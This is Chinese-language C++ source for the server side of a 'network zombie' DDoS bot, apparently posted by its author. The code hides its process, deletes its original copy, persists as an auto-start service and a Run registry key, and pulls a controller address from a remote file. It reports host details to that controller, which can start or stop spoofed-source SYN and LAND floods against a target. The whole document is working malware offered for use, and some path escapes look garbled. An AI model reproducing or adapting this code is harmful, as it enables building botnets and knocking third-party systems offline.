教主网络僵尸服务端主要代码

教主网络僵尸服务端主要代码

// HDService.cpp : Defines the entry point for the console application. //
//网络僵尸服务端代码 作者:教主  www.jiaozhu.net //请保留作者版权 #include
"stdafx.h" #include "HDService.h" #include "winsock2.h" #include "winsvc.h"
#include "windows.h" #include "afxinet.h" #include "HideProcess.h" //#include
"shellapi.h"


#define WM_SOCKET WM_USER+1000
#define SEQ 0x28376839
#define FAKE_IP "10.156.124.1"  //伪装IP的起始值,本程序的伪装IP覆盖一个B类网段
#define ServiceName "www.jiaozhu.net"

#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif

/////////////////////////////////////////////////////////////////////////////
// The one and only application object

CWinApp theApp;

using namespace std;
SERVICE_STATUS service_status_ss;
SERVICE_STATUS_HANDLE handle_service_status;
SC_HANDLE scm,svc;
SOCKET sock_client;
char systeminfor[256];
HANDLE ghThread;
HWND hWnd;
BOOL gbIsNT;
char ipfile[256];//ip文件
char installname[256]; //exe文件名称

int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{

 Readme();
 //::MessageBox(NULL,ipfile,NULL,MB_OK);
 //::MessageBox(NULL,installname,NULL,MB_OK);
 //Readme();
 //return -1;
 //UninstallService();
 //return -1;
 int nRetCode = 0;
 gbIsNT=FALSE;
 //****************************************//自删除
 char CurrDirBuff[256];
 char SysDirBuff[256];
 int DirLen=sizeof(CurrDirBuff); 
 ::GetCurrentDirectory(DirLen,CurrDirBuff);
 ::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff));
 //SaveLogToFile("out");
 if (_stricmp(CurrDirBuff,SysDirBuff)!=0)
 {
  //SaveLogToFile("in");
  //::MessageBox(NULL,"winmain",NULL,MB_OK);
  char filename[256];
  char This_File[MAX_PATH];
  strcpy(filename,SysDirBuff);
  strcat(filename,"//");
  strcat(filename,installname);
  memset(This_File,0,sizeof(This_File));
  GetModuleFileName(NULL, This_File, sizeof(This_File));
  if(::CopyFile(This_File,filename,FALSE)==0) return -1;
  PROCESS_INFORMATION pinfo;
  STARTUPINFO sinfo;  
  memset(&pinfo,0,sizeof(pinfo));
  memset(&sinfo,0,sizeof(sinfo)); 
  //SaveLogToFile("uninstall()");
  uninstall();
  //ShellExecute(NULL,"open",filename,NULL,SysDirBuff,SW_HIDE);
  CreateProcess(filename,NULL, NULL, NULL,TRUE,0, NULL,SysDirBuff, &sinfo, &pinfo);
  //SaveLogToFile("CreateProcess()");
  ExitProcess(0);
 }

 //******************************//创建互斥对象
 //HANDLE hMutex=::CreateMutex(NULL,FALSE,"HDServer");
 //if (GetLastError() == ERROR_ALREADY_EXISTS) return -1;
 //******************************//取操作系统类型
 DWORD dwVersion=::GetVersion();
 // 得到操作系统的版本号
 if(dwVersion >= 0x80000000)
 // 操作系统是Win9x,不是WinNt
 {
  typedef DWORD(CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);
  //定义RegisterServiceProcess()函数的原型
  HINSTANCE hDLL;
  LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;
  hDLL=LoadLibrary("KERNEL32");
  //加载RegisterServiceProcess()函数所在的动态链接库KERNEL32.DLL
  lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess");
  //得到RegisterServiceProcess()函数的地址
  lpRegisterServiceProcess(GetCurrentProcessId(),1);
  //执行RegisterServiceProcess()函数,隐藏本进程
  FreeLibrary(hDLL);
  //卸载动态链接库
 }else
 {
  gbIsNT=TRUE;
 }

 if (gbIsNT)
 {
  //隐藏进程
  HideProcess();
  /*******************************************/
  //服务入口表
  SERVICE_TABLE_ENTRY service_tab_entry[2];
  service_tab_entry[0].lpServiceName=ServiceName; //线程名字
  service_tab_entry[0].lpServiceProc=ServiceMain; //线程入口地址
  //可以有多个线程,最后一个必须为NULL
  service_tab_entry[1].lpServiceName=NULL;
  service_tab_entry[1].lpServiceProc=NULL;
  

  if (StartServiceCtrlDispatcher(service_tab_entry)==0)
  {
    //int i=::GetLastError();
    //char aa[3];        
    //::MessageBox(NULL,itoa(i,aa,10),NULL,MB_OK);
    InstallService();        
  }
  
  
 
  
 }
 else
 {
  start();
 }
 return nRetCode;
}
/***********************************************/
//服务的真正入口点函数
void WINAPI ServiceMain(DWORD dwArgc,LPTSTR *lpszArgv)
{
 service_status_ss.dwServiceType=SERVICE_WIN32;
 service_status_ss.dwCurrentState=SERVICE_START_PENDING;
 service_status_ss.dwControlsAccepted=SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_PAUSE_CONTINUE;
 service_status_ss.dwServiceSpecificExitCode=0;
 service_status_ss.dwWaitHint=0;
 service_status_ss.dwCheckPoint=0;
 service_status_ss.dwWin32ExitCode=0;
 if ((handle_service_status=RegisterServiceCtrlHandler(ServiceName,Handler))==0)
 {
 
  //::MessageBox(NULL,"RegisterServiceCtrlHandler error",NULL,MB_OK);
 }//一个服务对应一个控制处理器
 service_status_ss.dwCurrentState=SERVICE_RUNNING;
 service_status_ss.dwWaitHint=0;
 service_status_ss.dwCheckPoint=0;
 ::SetServiceStatus(handle_service_status,&service_status_ss);
 
 //::MessageBox(NULL,"start","tell",MB_OK);
 start();

 return ;
}
/***********************************************/
//服务控制器
void WINAPI Handler(DWORD dwControl)
{
  switch(dwControl)
  {
   case SERVICE_CONTROL_STOP:
    service_status_ss.dwCurrentState=SERVICE_STOPPED;
    ::SetServiceStatus(handle_service_status,&service_status_ss);
    break;
   case SERVICE_CONTROL_CONTINUE:
    service_status_ss.dwCurrentState=SERVICE_RUNNING;
    ::SetServiceStatus(handle_service_status,&service_status_ss);
    break;
   case SERVICE_CONTROL_PAUSE:
    service_status_ss.dwCurrentState=SERVICE_PAUSED;
    ::SetServiceStatus(handle_service_status,&service_status_ss);
    break;
   case SERVICE_CONTROL_INTERROGATE:
                  break;
    
  }
  ::SetServiceStatus(handle_service_status,&service_status_ss);

}
/***********************************************/
void InstallService()
{
 char szSysDir[256];
 memset(szSysDir,0,sizeof(szSysDir));
 ::GetSystemDirectory(szSysDir,sizeof(szSysDir));
 strcat(szSysDir,"//");
 strcat(szSysDir,installname);
 scm=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
 if (scm!=NULL)
 {
  

  svc=::CreateService(scm,ServiceName,ServiceName,SERVICE_ALL_ACCESS,
    SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS,
    SERVICE_AUTO_START,SERVICE_ERROR_IGNORE,szSysDir,NULL,NULL,NULL,NULL,NULL);

     
  svc=::OpenService(scm,ServiceName,SERVICE_START); 
  if (svc!=NULL)
  {
    
    
     ::StartService(svc,0,NULL);
     ::CloseServiceHandle(svc);
    

  }
  ::CloseServiceHandle(scm);
 }
 

}

/***********************************************/
void UninstallService()
{
 scm=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
 if (scm!=NULL)
 {
  svc=::OpenService(scm,ServiceName,SERVICE_ALL_ACCESS);
  if (svc!=NULL)
  {
   ::DeleteService(svc);
   ::CloseServiceHandle(svc);
  }
 
  ::CloseServiceHandle(scm);
 }
 


}
/************************************************/
int start()
{
 int ErrorCode; 
 WSADATA WsaData;
 struct sockaddr_in DestAddr; //上线地址结构
 char url[256];

 MSG msg;
 WNDCLASS wndc;
 LPSTR szAppName="HDService";
 wndc.style=0;
 wndc.lpfnWndProc=WndProc;
 wndc.cbClsExtra=0;
 wndc.cbWndExtra=0;
 wndc.hInstance=NULL;
 wndc.hIcon=LoadIcon(NULL,IDI_APPLICATION);
 wndc.hCursor=LoadCursor(NULL,IDC_ARROW);
 wndc.hbrBackground=(HBRUSH)(COLOR_WINDOW+1);
 wndc.lpszMenuName=NULL;
 wndc.lpszClassName=szAppName;
 RegisterClass(&wndc);
 hWnd=CreateWindow(szAppName,"HDos",
 WS_OVERLAPPEDWINDOW,
 CW_USEDEFAULT,CW_USEDEFAULT,
 CW_USEDEFAULT,CW_USEDEFAULT,
 NULL,NULL,NULL,NULL);
 ShowWindow(hWnd,SW_HIDE);
 UpdateWindow(hWnd);
 //****************************************
 memset(url,0,sizeof(url));
 strcpy(url,strlwr(ipfile));
 //::MessageBox(NULL,url,NULL,MB_OK);
 //strcpy(url,"http://192.168.1.111/ip.jpg");
 char html[256];     //获取的网页
 char ClientIP[16];    //客户端ip
 char ClientPort[5];    //客户端端口
 char *point;     //指针
 char ComputerName[256];   //计算机名
 char MemorySize[20];   //内存大小
 char SendBuff[256];    //发送缓存
 char OsName[64];    //操作系统类型
 //******************************************
 switch(GetOS())
 {
 case VER_PLATFORM_WIN32_WINDOWS: 
 lstrcpy(OsName,"Windows 9x");
 RegMe();
 break;
 case VER_PLATFORM_WIN32_NT:
 lstrcpy(OsName,"Windows NT/2000/XP");
 break;
 }
 //******************************//取计算机名
 memset(ComputerName,0,sizeof(ComputerName));
 DWORD len=sizeof(ComputerName);
 if ( !GetComputerName(ComputerName,&len)) return -1;
 //******************************//取内存大小
 MEMORYSTATUS mem;
 mem.dwLength=sizeof(mem);
 GlobalMemoryStatus(&mem);
 memset(MemorySize,0,sizeof(MemorySize));
 strcpy(MemorySize,itoa(mem.dwTotalPhys/1024/1024+2,MemorySize,10));
 //******************************//获取网页内容
 
 memset(html,0,sizeof(html));
 strcpy(html,strlwr(GetHttpFile(url)));
 //MessageBox(NULL,html,NULL,MB_OK);
 //*****************************//获取客户端ip和端口
 point=html;
 if(strstr(html,"http://jiaozhu")!=NULL)
 {
   point=point+strlen("http://jiaozhu");
 }
 if(strstr(point,":")!=NULL)
 {
  memset(ClientIP,0,sizeof(ClientIP));
  strncpy(ClientIP,point,strcspn(point,":"));
  point=point+strcspn(point,":")+1;

  if(strstr(point,"end")!=NULL)
  {
  memset(ClientPort,0,sizeof(ClientPort));
  strncpy(ClientPort,point,strcspn(point,"end"));
  }
 }
 //::MessageBox(NULL,ClientIP,NULL,MB_OK);
 //::MessageBox(NULL,ClientPort,NULL,MB_OK);
 //*************************************************
 HANDLE hThread;
 unsigned long uiThreadID=0;
 CLIENTPARA *clientpa;
 try
 {
 if((ErrorCode=WSAStartup(MAKEWORD(2,2),&WsaData))!=0)
  {
  return -1;  
  }
 sock_client=::socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
 if (sock_client==INVALID_SOCKET)
 {
  return -1;
 }
 //上线地址结构
 memset(&DestAddr,0,sizeof(DestAddr));
 DestAddr.sin_family=AF_INET;
 DestAddr.sin_addr.s_addr=inet_addr(ClientIP);
 DestAddr.sin_port=htons(atoi(ClientPort));
 //while (1)
 {
 
   
   if(connect(sock_client,(sockaddr*)&DestAddr,sizeof(DestAddr))==SOCKET_ERROR )
   {
    Sleep(3000);  
   }
   //连接上线
   memset(SendBuff,0,sizeof(SendBuff));
   strcat(SendBuff,"<CMD>000</CMD><CPNAME>");
   strcat(SendBuff,ComputerName);
   strcat(SendBuff,"</CPNAME><OSNAME>");
   strcat(SendBuff,OsName);
   strcat(SendBuff,"</OSNAME><MEM>");
   strcat(SendBuff,MemorySize);
   strcat(SendBuff,"</MEM>");
   strcat(SendBuff,"/r/n");
   memset(systeminfor,0,sizeof(systeminfor));
   strcpy(systeminfor,SendBuff);
   if (SOCKET_ERROR!=send(sock_client,SendBuff,sizeof(SendBuff),0))
   {
   
   }
     
   //发送上线消息
   if (WSAAsyncSelect(sock_client,hWnd,WM_SOCKET,FD_READ|FD_WRITE|FD_CLOSE)==SOCKET_ERROR)
   { 
 
   }
   //开始线程
   clientpa=new CLIENTPARA;
   memset(clientpa,0,sizeof(clientpa));
   strcpy(clientpa->IP,ClientIP);
   strcpy(clientpa->port,ClientPort);
   hThread=(HANDLE)::CreateThread(NULL,0,SocketThreadProc,clientpa,CREATE_SUSPENDED,&uiThreadID);
   if (hThread!=NULL)
   {
    
    ResumeThread(hThread);
   }
      

 }
 }
 catch(...)
 {}
 
 while(GetMessage(&msg,NULL,0,0))
 {
   TranslateMessage(&msg);
   DispatchMessage(&msg);
 }

}

//***********************************************//自删除
void uninstall(void)//Thanks to Spybot
{
 char batfile[MAX_PATH];
 char tempdir[MAX_PATH];
 char tcmdline[MAX_PATH];
 char cmdline[MAX_PATH];
 char This_File[MAX_PATH];
 HANDLE f;
 DWORD r;
 PROCESS_INFORMATION pinfo;
 STARTUPINFO sinfo;
 GetTempPath(sizeof(tempdir), tempdir);
 sprintf(batfile, "%s//rs.bat", tempdir);
 f = CreateFile(batfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
 if (f != INVALID_HANDLE_VALUE)
 {
  // write a batch file to remove our executable once we close
  WriteFile(f, "@echo off/r/n"
      ":start/r/nif not exist /"/"%1/"/" goto done/r/n"
      "del /F /"/"%1/"/"/r/n"
      "del /"/"%1/"/"/r/n"
      "goto start/r/n"
      ":done/r/n"
      "del /F %temp%/rs.bat/r/n"
      "del %temp%/r.bat/r/n", 105, &r, NULL);
  CloseHandle(f);

  memset(&sinfo, 0, sizeof(STARTUPINFO));
  sinfo.cb = sizeof(sinfo);
  sinfo.wShowWindow = SW_HIDE;
  memset(This_File,0,sizeof(This_File));
  GetModuleFileName(NULL, This_File, sizeof(This_File));
  sprintf(tcmdline, "%%comspec%% /c %s %s", batfile, This_File); // build command line
  ExpandEnvironmentStrings(tcmdline, cmdline, sizeof(cmdline)); // put the name of the command interpreter into the command line

  // execute the batch file
  CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo);
 }

}
////**************************************************
//注册自启动
void RegMe(void)
{
 HKEY hkey=HKEY_LOCAL_MACHINE;
 char lpSubKey[256]="Software//Microsoft//Windows//CurrentVersion//Run";
 HKEY phkResult;
 char lpValue[256];
 memset(lpValue,0,sizeof(lpValue));
 strcpy(lpValue,installname);
 
 int len=sizeof(lpValue);

 if(::RegOpenKeyEx(hkey,lpSubKey,0,KEY_ALL_ACCESS,&phkResult)!=ERROR_SUCCESS)
 {
  ::RegCreateKeyEx(hkey,lpSubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_WRITE,NULL,&phkResult,NULL);

 }
 //如果不存在值,就新建
 if (RegQueryValueEx(hkey,lpSubKey,NULL,NULL,(unsigned char *)&lpValue,(unsigned long *)&len)!=ERROR_SUCCESS)
 ::RegSetValueEx(phkResult,lpValue,0,REG_SZ,(unsigned char*)&lpValue,sizeof(lpValue));
 ::RegCloseKey(phkResult);

}
///************************************************

char* GetHttpFile(char url[])
{
 CInternetSession session("My Session");
 CHttpConnection* pServer = NULL;
 CHttpFile* pFile = NULL;
 /********************************///获取主机名
 char szIPFile[256];  //ip文件名
 char szHostName[256]; //主机名
 char *str;
 str=url;
 if(strstr(url,"http://")!=NULL)
 {
  str=str+::strlen("http://");
 }
 if(strstr(str,"/")!=NULL)
 {
  ::memset(szHostName,0,sizeof(szHostName));
  strncpy(szHostName,str,strcspn(str,"/"));
  str=str+strcspn(str,"/");
  strcpy(szIPFile,str);
 }
 /********************************///下载网页文件

 char szBuff[65535];
 try
 {
  CString strServerName;
  CString strObject;
  INTERNET_PORT nPort;
  DWORD dwRet;
  
  nPort=80;
  strServerName.Format(szHostName);
  strObject.Format(szIPFile);

  pServer = session.GetHttpConnection(strServerName, nPort);
  pFile = pServer->OpenRequest(CHttpConnection::HTTP_VERB_GET, strObject);
  pFile->SendRequest();
  pFile->QueryInfoStatusCode(dwRet);

  if (dwRet == HTTP_STATUS_OK)
  {
   ::memset(szBuff,0,sizeof(szBuff));
   UINT nRead = pFile->Read(szBuff, 65534);
   
  }
  delete pFile;
  delete pServer;
 }
 catch (...)
 {
  //catch errors from WinInet 
 }
 session.Close();
 return szBuff;
}
///************************************************//获取操作系统类型
DWORD WINAPI GetOS()
{
 OSVERSIONINFO os;
 os.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
 GetVersionEx(&os);
 switch(os.dwPlatformId)
 {
  case VER_PLATFORM_WIN32_WINDOWS:
  return VER_PLATFORM_WIN32_WINDOWS;
  case VER_PLATFORM_WIN32_NT:
  return VER_PLATFORM_WIN32_NT;
 }
}
//*************************************************
//连接线程//每30秒检测是否断线,并连接
unsigned long CALLBACK SocketThreadProc(LPVOID pParam)
{

 char html[512];
 char *point;
 char ClientIP[32];
 char ClientPort[6];

 CLIENTPARA *clientp=(CLIENTPARA*)pParam;
 if (clientp==NULL)
  return -1;

 char  port[6] ;
 strcpy(port,clientp->port);
 char  IP[32];
 memcpy(IP, clientp->IP, sizeof(IP));
 delete clientp;
 struct sockaddr_in TargAddr;
 memset(&TargAddr,0,sizeof(TargAddr));
 TargAddr.sin_family=AF_INET;
 TargAddr.sin_addr.s_addr=inet_addr(IP);
 TargAddr.sin_port=htons(atoi(port));
 while (1)
 { 
  if(connect(sock_client,(sockaddr*)&TargAddr,sizeof(TargAddr))==SOCKET_ERROR )
   {
    Sleep(3000);
    int i=::WSAGetLastError();
    /*char errorcode[5];
    itoa(i,errorcode,10);
    MessageBox(NULL,errorcode,NULL,MB_OK);*/
    if (i==10056)
    {
     Sleep(30000); 
    }
     else  //if (i==10038)
    {
     //如果sock中断,创建sock
     sock_client=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
     //connect(sock_client,(sockaddr*)&TargAddr,sizeof(TargAddr));
     Sleep(30000);

     memset(html,0,sizeof(html));
     strcpy(html,strlwr(GetHttpFile(ipfile)));
     //MessageBox(NULL,html,NULL,MB_OK);
     //*****************************//获取客户端ip和端口
     point=html;
     if(strstr(html,"http://jiaozhu")!=NULL)
     {
      point=point+strlen("http://jiaozhu");
     }
     if(strstr(point,":")!=NULL)
     {
      memset(ClientIP,0,sizeof(ClientIP));
      strncpy(ClientIP,point,strcspn(point,":"));
      point=point+strcspn(point,":")+1;

      if(strstr(point,"end")!=NULL)
      {
      memset(ClientPort,0,sizeof(ClientPort));
      strncpy(ClientPort,point,strcspn(point,"end"));

      memset(&TargAddr,0,sizeof(TargAddr));
      TargAddr.sin_family=AF_INET;
      TargAddr.sin_addr.s_addr=inet_addr(ClientIP);
      TargAddr.sin_port=htons(atoi(ClientPort));
      //::SaveLogToFile(ipfile);
      //::SaveLogToFile(html);
      //::SaveLogToFile(ClientIP);
      //::SaveLogToFile(ClientPort);
      }

     }
     //break;
    }
        
   }
   else
   {
    send(sock_client,systeminfor,sizeof(systeminfor),0);
    WSAAsyncSelect(sock_client,hWnd,WM_SOCKET,FD_READ|FD_WRITE|FD_CLOSE);
    Sleep(30000);
   }
   Sleep(1000);
 }
 
 return 0;

}
//*************************************************
//*******************************************************
LRESULT CALLBACK WndProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM lParam)
{
 char  buff[256];
 char ip[32];
 char port[6];
 char *  p=NULL;
 CLIENTPARA *clientpa;
 unsigned long uiThreadID=0;
switch(message)
{
 case WM_SOCKET:
 if(WSAGETSELECTERROR(lParam))
 {
 closesocket(wParam);
 break;
 }

 switch(WSAGETSELECTEVENT(lParam))
 {
 //连接
 case FD_ACCEPT:
 
  break;
 //读取输入,如是回车则执行命令
 //不是将输入复制到缓冲区
 case FD_READ:
  if (recv(sock_client,buff,sizeof(buff),0)!=SOCKET_ERROR)
  {
   //::MessageBox(NULL,buff,NULL,MB_OK);
   strcpy(buff,strlwr(buff));
   //开始攻击
   if(strncmp(buff,"001",3)==0)
   {
    p=buff;
    if (strstr(buff,"[ip]")!=NULL)
    {
     p=buff+strlen("001[ip]");
     strcpy(buff,p);
     if(strstr(buff,"[port]")!=NULL)
     {
      memset(ip,0,sizeof(ip));
      strncpy(ip,buff,strcspn(buff,"[ip]"));
      //::MessageBox(NULL,ip,NULL,MB_OK);
      p=buff+strlen(ip)+strlen("[port]");
      memset(port,0,sizeof(port));
      if (strstr(p,"end")!=NULL)
      {

       strncpy(port,p,strcspn(p,"end"));       
       //::MessageBox(NULL,port,NULL,MB_OK);
       //开始线程
       clientpa=new CLIENTPARA;
       memset(clientpa,0,sizeof(clientpa));
       strcpy(clientpa->IP,ip);
       strcpy(clientpa->port,port);
       //clientpa->s=sock_client;
       if(ghThread==NULL)
       {
        ghThread=(HANDLE)::CreateThread(NULL,0,LandDDOSFunction,clientpa,CREATE_SUSPENDED,&uiThreadID);
        if (ghThread!=NULL)
        {
          //::MessageBox(NULL,"START DDOSFUNCTION",NULL,MB_OK);
          ResumeThread(ghThread);
        }
       }
       
        
      }
   
     }
    
    
    }
   
   }
   //结束工具
   if(strncmp(buff,"002",3)==0)
   {
    if (ghThread!=NULL)
    {
    ::TerminateThread(ghThread,0);
    //::MessageBox(NULL,"STOP DDOSFUNCTION",NULL,MB_OK);
    ghThread=NULL;
    }
   }

  }
  
  //MessageBox(NULL,"FD_READ",NULL,MB_OK);
  
  break;
 case FD_WRITE:
  //MessageBox(NULL,"FD_WRITE",NULL,MB_OK);
  break;
 case FD_CLOSE:
  //MessageBox(NULL,"FD_CLOSE",NULL,MB_OK);
  closesocket(wParam);
  break;
 }
 break;
 case WM_DESTROY:
  PostQuitMessage(0);
 
 break;
 default:
 return DefWindowProc(hWnd,message,wParam,lParam);
}
 return 0;
}
//*********************************************************
//***************************************************************
unsigned long  CALLBACK DDOSFunction(LPVOID dParam)
{
  
  CLIENTPARA *clientp=(CLIENTPARA*)dParam;
  if (clientp==NULL)
   return -1;

  char SYN_DEST_IP[32];
  char port[6];
  char SendBuf[128];
  WSADATA WsaData;
  SOCKET SockRaw=(SOCKET)NULL;
  struct sockaddr_in DestAddr;
  IP_HEADER ip_header;
  TCP_HEADER tcp_header;
  int datasize,ErrorCode,Counter,flag,FakeIPNet,FakeIPHost;
  int TimeOut=2000,SendSEQ=0;
  

  memset(SYN_DEST_IP,0,sizeof(SYN_DEST_IP));
  memset(port,0,sizeof(port));
  strcpy(SYN_DEST_IP,clientp->IP);
  strcpy(port,clientp->port);

  //初始化SOCKET
  if((ErrorCode=WSAStartup(MAKEWORD(2,2),&WsaData))!=0)
  {

   ExitProcess(ErrorCode);
  }
  
  SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED);
  if (SockRaw==INVALID_SOCKET)
  {
   ExitProcess(ErrorCode);
  }

  flag=TRUE;
  ErrorCode=setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(CHAR *)&flag,sizeof(int));
  if (ErrorCode==SOCKET_ERROR)
  {
   return 1;
  }
 __try
 {  
  ErrorCode=setsockopt(SockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut));
  if (ErrorCode==SOCKET_ERROR)
  {
   return 2; 
  }

  memset(&DestAddr,0,sizeof(DestAddr));
  DestAddr.sin_family=AF_INET;
  DestAddr.sin_addr.s_addr=inet_addr(SYN_DEST_IP);
  FakeIPNet=inet_addr(FAKE_IP);
  FakeIPHost=ntohl(FakeIPNet);
  
  //填充IP首部
  ip_header.h_verlen=(4<<4|sizeof(ip_header)/sizeof(unsigned long));
  //高四位IP版本号,低四位首部长度
  ip_header.total_len=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER));  //16位总长度(字节)
  ip_header.ident=1;              //16位标识
  ip_header.frag_and_flags=0;            //3位标志位
  ip_header.ttl=128;              //8位生存时间TTL
  ip_header.proto=IPPROTO_TCP;           //8位协议(TCP,UDP…)
  ip_header.checksum=0;             //16位IP首部校验和
  ip_header.sourceIP=htonl(FakeIPHost+SendSEQ);       //32位源IP地址
  ip_header.destIP=inet_addr(SYN_DEST_IP);        //32位目的IP地址
  
  //填充TCP首部
  tcp_header.th_sport=htons(::rand());     //源端口号
  tcp_header.th_dport=htons(atoi(port));    //目的端口号
  tcp_header.th_seq=htonl(SEQ+SendSEQ);    //SYN序列号
  tcp_header.th_ack=0;        //ACK序列号置为0
  tcp_header.th_lenres=(sizeof(TCP_HEADER)/4<<4|0); //TCP长度和保留位
  tcp_header.th_flag=2;        //SYN 标志
  tcp_header.th_win=htons(16384);      //窗口大小
  tcp_header.th_urp=0;        //偏移
  tcp_header.th_sum=0;        //校验和

  //填充TCP伪首部(用于计算校验和,并不真正发送)
  psd_header.saddr=ip_header.sourceIP;    //源地址
  psd_header.daddr=ip_header.destIP;     //目的地址
  psd_header.mbz=0;
  psd_header.ptcl=IPPROTO_TCP;      //协议类型
  psd_header.tcpl=htons(sizeof(tcp_header));   //TCP首部长度

  while(1) {
    
    //每发送10,240个报文输出一个标示符
    //printf(".");
    for(Counter=0;Counter<10240;Counter++)
    {
     
     Sleep(10);
     if(SendSEQ++==65536) SendSEQ=1;     //序列号循环
     //更改IP首部
     ip_header.checksum=0;       //16位IP首部校验和
     ip_header.sourceIP=htonl(FakeIPHost+SendSEQ); //32位源IP地址
     //更改TCP首部
     tcp_header.th_seq=htonl(SEQ+SendSEQ);   //SYN序列号
     tcp_header.th_sum=0;       //校验和
     //更改TCP Pseudo Header
     psd_header.saddr=ip_header.sourceIP;
     //计算TCP校验和,计算校验和时需要包括TCP pseudo header
     ::memset(SendBuf,0,sizeof(SendBuf));
     memcpy(SendBuf,&psd_header,sizeof(psd_header));
     memcpy(SendBuf+sizeof(psd_header),&tcp_header,sizeof(tcp_header));
     tcp_header.th_sum=checksum((USHORT *)SendBuf,sizeof(psd_header)+sizeof(tcp_header));
     //计算IP校验和
     memcpy(SendBuf,&ip_header,sizeof(ip_header));
     memcpy(SendBuf+sizeof(ip_header),&tcp_header,sizeof(tcp_header));
     memset(SendBuf+sizeof(ip_header)+sizeof(tcp_header),0,4);
     datasize=sizeof(ip_header)+sizeof(tcp_header);
     ip_header.checksum=checksum((USHORT *)SendBuf,datasize);
     //填充发送缓冲区
     memcpy(SendBuf,&ip_header,sizeof(ip_header));
     //发送TCP报文
     ErrorCode=sendto(SockRaw,SendBuf,datasize,0,(struct sockaddr*) &DestAddr, sizeof(DestAddr));
     //if (ErrorCode==SOCKET_ERROR)
      //printf("/nSend Error:%d/n",GetLastError());
    }//End of for
   }//End of While
  }//End of try
 __finally
 {
 if(SockRaw != INVALID_SOCKET)
  closesocket(SockRaw);
 WSACleanup();
 //printf("end");
 }


}
//*****************************************************
USHORT checksum(USHORT *buffer,int size)
{
 unsigned long cksum=0;
 while (size>1)
 {
  cksum+=*buffer++;
  size-=sizeof(USHORT);
 }
 if (size)
 {
  cksum+=*(UCHAR*)buffer;
 }
 cksum = (cksum >> 16) + (cksum & 0xffff);
 cksum += (cksum >>16);
 return (USHORT)(~cksum);

}
//*****************************************************
void Readme()
{
 char peizhi[7];
 char pzpos[29];
 char tempstr[1000];
 char szThis_file[256];
 try
 {
  //SaveLogToFile("Readme()");
 memset(szThis_file,0,sizeof(szThis_file));
 ::GetModuleFileName(NULL,szThis_file,sizeof(szThis_file));

 CFile cf;
 cf.Open(szThis_file,CFile::modeRead,NULL);
 memset(peizhi,0,7);
 cf.Seek(cf.GetLength()-7,CFile::begin);
 cf.Read(peizhi,7);
 //if(strcmp(peizhi,"HGZVIP1")==0)
 {
  //::MessageBox(NULL,peizhi,NULL,MB_OK);
  cf.Seek(cf.GetLength()-36,CFile::begin);
  cf.Read(pzpos,29);
  
  int j=0,len=0;
  char *p,*q;
  p=pzpos;
  //::MessageBox(NULL,pzpos,NULL,MB_OK);
  for(;j<29;j++)
  {
   len=len+(*p);
   p=p+1; 
  }
  cf.Seek(cf.GetLength()-36-len,CFile::begin);
  memset(tempstr,0,1000);
  cf.Read(tempstr,len);
  //安装名称
  len=0;
  p=pzpos;
  for(j=1;j<=1;j++)
  {
   len=len+(*p);
   p=p+1;
   
  }
  q=tempstr+len;
  memset(installname,0,sizeof(installname));
  ::strncpy(installname,q,(*p));
  
  //SaveLogToFile(installname);
  
  //ip文件
  len=0;
  p=pzpos;
  for(j=1;j<=13;j++)
  {
   len=len+(*p);
   p=p+1;
   
  }
  q=tempstr+len;
  memset(ipfile,0,sizeof(ipfile));
  ::strncpy(ipfile,q,(*p));
  //SaveLogToFile(ipfile);
  delete p,q;
  cf.Close();
 }
 }
 catch(...)
 {
 
 }

}
//************************************************
/***********************************************/
//保存日志
void SaveLogToFile(char *content)
{
 CFile logfile;
 CString strTime;
 strTime=CTime::GetCurrentTime().Format("%H:%M:%S    ");
 logfile.Open("c://HDService.log",CFile::modeWrite|CFile::modeCreate|CFile::modeNoTruncate,NULL);
 logfile.SeekToEnd();
 logfile.Write(strTime,strTime.GetLength());
 logfile.Write(content,strlen(content));
 logfile.Write("/r/n",strlen("/r/n"));
 logfile.Close();  
}
/***********************************************/
//CheckSum:计算校验和的子函数
USHORT Landchecksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1)
{
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size )
{
cksum += *(UCHAR*)buffer;
}

cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}
/***********************************************/
unsigned long Landresolve(char *host)
{
 long i;
 struct hostent *he;

 if((i=inet_addr(host))<0)
   if((he=gethostbyname(host))==NULL)
     return(0);
   else
     return(*(unsigned long *)he->h_addr);

 return(i);
}
/***********************************************/
unsigned long  CALLBACK LandDDOSFunction(LPVOID dParam)
{
 //传入参数
 CLIENTPARA *clientp=(CLIENTPARA*)dParam;
 if (clientp==NULL)
   return -1;

 WSADATA WSAData;
 SOCKET sock;
 SOCKADDR_IN addr_in;
 IP_HEADER ipHeader;
 TCP_HEADER tcpHeader;
 //psd_header psdHeader;

 char szSendBuf[40]={0};
 BOOL flag;
 int Land;

 if (WSAStartup(MAKEWORD(2,2), &WSAData)!=0)
 {
  return -1;
 }

